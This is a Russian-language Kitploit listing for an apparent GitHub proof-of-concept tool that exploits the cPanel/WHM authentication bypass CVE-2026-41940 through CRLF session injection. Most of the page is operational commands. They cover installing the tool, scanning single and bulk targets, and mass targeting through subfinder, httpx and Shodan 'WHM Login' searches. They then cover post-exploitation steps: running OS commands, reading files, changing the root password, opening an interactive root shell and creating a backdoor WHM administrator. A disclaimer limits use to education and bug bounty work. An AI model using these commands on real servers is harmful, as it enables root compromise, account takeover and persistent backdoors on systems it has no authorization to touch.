Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2026-41940-PoC — Эксплуатирует обход аутентификации cPanel/WHM CVE-2026-41940 через CRLF-инъекцию в сессию для неаутентифицированного доступа к WHM с правами root, затем перечисляет учётные записи, выполняет команды ОС и открывает интерактивную оболочку для авторизованного тестирования. | Kitploit
Инструменты/GitHubGitHub/lanicer/cve-2026-41940-poc
Аутентификация и авторизацияПовышение привилегийСканеры уязвимостейМеханизмы персистентностиАнализ уязвимостейЭксплуатация веб-приложенийПост-эксплуатацияТестирование на Проникновение

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHublanicer/cve-2026-41940-poc

cve-2026-41940-PoC

Эксплуатирует обход аутентификации cPanel/WHM CVE-2026-41940 через CRLF-инъекцию в сессию для неаутентифицированного доступа к WHM с правами root, затем перечисляет учётные записи, выполняет команды ОС и открывает интерактивную оболочку для авторизованного тестирования.

Репозиторий
53297132 дней назадПроверено Kitploit

CVE-2026-41940

⚠ Этот инструмент создан исключительно в образовательных целях или для программ bug bounty. Несанкционированное использование вне контролируемых сред строго запрещено.

Описание

Инструмент для эксплуатации CVE-2026-41940 — критического обхода аутентификации в cPanel & WHM (CVSS 10.0), который позволяет неаутентифицированным злоумышленникам получить доступ к WHM с правами root путём внедрения CRLF-последовательностей в серверные файлы сессий через заголовок Authorization — без каких-либо учётных данных.

Как это работает

CVE-2026-41940, в общих чертах, эксплуатируется из-за сбоя в том, как система обрабатывает сеансы аутентификации в cPanel/WHM. Атака обычно начинается с обычного запроса к интерфейсу входа, где приложение преждевременно инициализирует сеанс до полной проверки учётных данных пользователя. Из-за некорректной обработки входных данных, связанных с сеансом, определённые сформированные или неожиданные структуры входных данных могут изменить то, как сервер хранит или интерпретирует данные сеанса.

Затронутые версии

ВерсияУязвимыеИсправленные
110.x≤ 11.110.0.9611.110.0.97
118.x≤ 11.118.0.6211.118.0.63
126.x≤ 11.126.0.5311.126.0.54
132.x≤ 11.132.0.2811.132.0.29
134.x≤ 11.134.0.1911.134.0.20
136.x≤ 11.136.0.411.136.0.5

Установка (Windows/Mac OS)🔄

root@kitploit:~
git clone https://github.com/lanicer/CVE-2026-41940-PoC
cd CVE-2026-41940-PoC
# Windows 
python cve.py
# MacOS/Linux
python3 cve.py

Как использовать

Инструмент требует указать целевой домен.

Режим одиночной цели:

root@kitploit:~
python cve.py -u https://target1.com:2083

Вы также можете выполнить сканирование из файла target.txt (создайте его):

root@kitploit:~
python cve.py -l target.txt -t 50 -o result.json

Базовое сканирование:

Доступные команды:

root@kitploit:~
python cve.py -u https://victim1.com:2083 # single target scan
python cve.py info -u https://victim1.com:2083 # Retrieves system information (version, load, disk usage).
python cve.py host -u https://victim1.com:2083 # Retrieves the hostname of the target server.

Действия после эксплуатации

root@kitploit:~
# List all accounts on the server
python cve.py list -u https://target.com:2087

# OS command
python cve.py cmd -u https://target.com:2087 --cmd "id;whoami;uname -a"
python cve.py cmd -u https://target.com:2087 --cmd "ls /home"

# Get server info (hostname, disk, MySQL host)
python cve.py info -u https://target.com:2087

# Change root password
python cve.py passwd -u https://target.com:2087 --passwd 'NewPassword1423!!@'

# Interactive WHM shell
python cve.py shell -u https://target.com:2087

Конвейеры

root@kitploit:~
# subfinder → httpx → cPanelSniper
subfinder -d victim.com -silent | \
  httpx -silent -ports 2085,2086 -threads 50 | \
  python cve.py scan -t 40 -o results.json

# From scope list
cat scope.txt | \
  httpx -silent -ports 2085,2086 -threads 100 | \
  python cve.py scan -t 30 -o results.json

# Shodan results
shodan search --fields ip_str,port 'title:"WHM Login"' | \
  awk '{print "https://"$1":"$2}' | \
  python cve.py -t 30 -o shodan_results.json

# Multiple sources combined
{ subfinder -d victim.com -silent; cat extra.txt; } | \
  httpx -silent -ports 2087 | \
  python cve.py -t 20 --action list

Режим WHM Shell

После успешного выполнения вы можете открыть интерактивную оболочку WHM:

root@kitploit:~
python cve.py shell -u

Все команды оболочки


Справочник по CLI

root@kitploit:~
usage: cve.py [-h] [-u URL] [-l LIST] [--hostname HOSTNAME]
                       [-t THREADS] [--timeout TIMEOUT] [--rate-limit N]
                       [--action ACTION] [--passwd PASS] [--cmd CMD]
                       [--new-user USER] [--new-domain DOMAIN]
                       [-o OUTPUT] 

Target:
  -u, --url URL          Single target URL (e.g. https://host:2087)
  -l, --list LIST        File with URLs (one per line)
  --hostname HOSTNAME    Override canonical Host header (auto-discovered)

Scan:
  -t, --threads N        Concurrent threads (default: 10)
  --timeout N            Request timeout seconds (default: 15)
  --rate-limit N         Delay between targets (default: 0)
  --force                Skip cPanel detection check

Post-Exploit:
  --action ACTION        Action: list | passwd | cmd | exec | info |
                                 version | shell | adduser
  --passwd PASS          New root password (--action passwd)
  --cmd CMD              OS command (--action cmd/exec)
  --new-user USER        New cPanel username (--action adduser)
  --new-domain DOMAIN    New cPanel domain (--action adduser)

Output:
  -o, --output FILE      Save results to JSON file
  --no-color             Disable ANSI colors

Отказ от ответственности

⚠ Этот инструмент создан исключительно в образовательных целях или для программ bug bounty. Несанкционированное использование вне контролируемых сред строго запрещено.

Скачать инструмент
КомандаОписание
idПоказать ID пользователя
hostnameПолучить hostname сервера
accountsПеречислить все учётные записи пользователей
infoНагрузка, диск, хост MySQL, версия
cat <path>Прочитать содержимое файла
exec <cmd>Выполнить команду ОС
newadmin <user> <pass>Создать бэкдор-администратора WHM
passwd <pass>Сменить пароль root
l [path]Показать содержимое каталога
helpПоказать все команды
exitВыйти из режима оболочки